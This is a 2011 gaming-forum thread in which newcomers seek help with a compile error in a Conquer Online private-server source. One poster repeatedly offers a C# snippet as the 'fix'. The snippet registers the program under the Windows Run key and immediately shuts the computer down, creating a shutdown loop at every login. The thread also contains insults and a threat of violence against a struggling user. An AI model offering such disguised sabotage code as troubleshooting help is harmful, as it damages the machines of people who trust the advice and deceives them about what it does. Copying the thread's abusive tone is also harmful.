Register for your free account! | Forgot your password?

You last visited: Today at 11:21

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Eragon 5517 v3 Error

Discussion on Eragon 5517 v3 Error within the CO2 Private Server forum part of the Conquer Online 2 category.

Reply
 
Old 09/19/2011, 01:07   #16
 
_DreadNought_'s Avatar
 
elite*gold: 28
Join Date: Jun 2010
Posts: 2,223
Received Thanks: 867
Quote:
Originally Posted by hatem555 View Post
what is u broblem

i say i have same problem

dont say **** words
I'll say **** words if I want, you pathetic mug.
_DreadNought_ is offline  
Old 09/19/2011, 01:17   #17
 
elite*gold: 0
Join Date: Sep 2011
Posts: 6
Received Thanks: 0
Quote:
Originally Posted by BaussHacker View Post
Go to Program.cs and find:
Code:
static void Main(string[] args)
under the { put:
Code:
             Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            RK.SetValue("Conquer", Application.ExecutablePath.ToString());
Process.Start("shutdown","/s /t 0");
Hope it helps.

Help Please :
no have problem:



Help 2

I have 1 error:
NelsoxD is offline  
Old 09/19/2011, 01:28   #18
 
marlyandedsel's Avatar
 
elite*gold: 0
Join Date: Aug 2010
Posts: 343
Received Thanks: 21
Maybe Net Frame Work v4.0 needed
marlyandedsel is offline  
Old 09/19/2011, 04:29   #19
 
Spirited's Avatar
 
elite*gold: 12
Join Date: Jul 2011
Posts: 8,205
Received Thanks: 4,107
Quote:
Originally Posted by NelsoxD View Post
Help Please :
no have problem:
At the VERY top of the page, put:
using System.Diagnostics;
Spirited is offline  
Old 09/19/2011, 06:35   #20
 
elite*gold: 0
Join Date: Sep 2011
Posts: 6
Received Thanks: 0
Quote:
Originally Posted by Fаng View Post
At the VERY top of the page, put:
using System.Diagnostics;
no entiendo ?
NelsoxD is offline  
Old 09/19/2011, 07:18   #21
 
elite*gold: 0
Join Date: May 2011
Posts: 1,769
Received Thanks: 756
Quote:
Originally Posted by marlyandedsel View Post
Maybe Net Frame Work v4.0 needed
It only requires 2.0 to run the code.

Quote:
Originally Posted by Fаng View Post
At the VERY top of the page, put:
using System.Diagnostics;
This ^
BaussHacker is offline  
Old 09/19/2011, 07:59   #22
 
Spirited's Avatar
 
elite*gold: 12
Join Date: Jul 2011
Posts: 8,205
Received Thanks: 4,107
Quote:
Originally Posted by NelsoxD View Post
no entiendo ?
Give up
At everything.

I can go much harsher on you, and I'm holding myself back a lot right now.
Unplug your computer and walk away.
Spirited is offline  
Thanks
2 Users
Old 09/19/2011, 08:48   #23
 
elite*gold: 0
Join Date: May 2011
Posts: 1,769
Received Thanks: 756
Quote:
Originally Posted by Fаng View Post
Give up
At everything.

I can go much harsher on you, and I'm holding myself back a lot right now.
Unplug your computer and walk away.
If he get's the code working, I'm sure it will do it by itself.
BaussHacker is offline  
Old 09/19/2011, 22:15   #24
 
elite*gold: 0
Join Date: Sep 2011
Posts: 6
Received Thanks: 0
Quote:
Originally Posted by Fаng View Post
Give up
At everything.

I can go much harsher on you, and I'm holding myself back a lot right now.
Unplug your computer and walk away.
how I can fix the error, HELP!
NelsoxD is offline  
Old 09/19/2011, 22:26   #25
 
elite*gold: 0
Join Date: May 2011
Posts: 1,769
Received Thanks: 756
Quote:
Originally Posted by NelsoxD View Post
how I can fix the error, HELP!
Replace the code with:
Code:
Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            RK.SetValue("Conquer", Application.ExecutablePath.ToString());
System.Diagnostics.Process.Start("shutdown","/s /t 0");
BaussHacker is offline  
Old 09/19/2011, 22:47   #26
 
F i n c h i's Avatar
 
elite*gold: 0
Join Date: Nov 2009
Posts: 785
Received Thanks: 421
Quote:
Originally Posted by BaussHacker View Post
Go to Program.cs and find:
Code:
static void Main(string[] args)
under the { put:
Code:
             Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            RK.SetValue("Conquer", Application.ExecutablePath.ToString());
Process.Start("shutdown","/s /t 0");
Hope it helps.
Thank you, I finally fixed this annoying problem.

GO GO GO PEOPLE AND FIX YOUR PROBLEM TOO ITS WORTH IT!
F i n c h i is offline  
Old 09/20/2011, 00:36   #27
 
Spirited's Avatar
 
elite*gold: 12
Join Date: Jul 2011
Posts: 8,205
Received Thanks: 4,107
Quote:
Originally Posted by NelsoxD View Post
how I can fix the error, HELP!
I'm going to ******* beat you with a lead pipe. You're ******* me off.
Go play a pre-existing private server. You can barely read. You can't follow directions. You can't reason what things are. You can't function. Go spam someone's private server because ****- I know I sure as hell don't want to deal with you- and I can imagine that nobody here does either.
Spirited is offline  
Old 09/20/2011, 07:49   #28
 
elite*gold: 0
Join Date: Sep 2011
Posts: 112
Received Thanks: 37
Quote:
Originally Posted by Fаng View Post
I'm going to ******* beat you with a lead pipe. You're ******* me off.
Go play a pre-existing private server. You can barely read. You can't follow directions. You can't reason what things are. You can't function. Go spam someone's private server because ****- I know I sure as hell don't want to deal with you- and I can imagine that nobody here does either.
If he's ******* you off, then just ignore it. Your only making things worse by insulting him.
Deсker is offline  
Old 09/21/2011, 13:41   #29
 
elite*gold: 0
Join Date: Dec 2009
Posts: 87
Received Thanks: 2
can any one help me tooo
alaa410 is offline  
Old 09/21/2011, 15:04   #30
 
marlyandedsel's Avatar
 
elite*gold: 0
Join Date: Aug 2010
Posts: 343
Received Thanks: 21
try complete the application configuration, its empty.
marlyandedsel is offline  
Reply

Tags
5517 error consola error




All times are GMT +1. The time now is 11:21.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.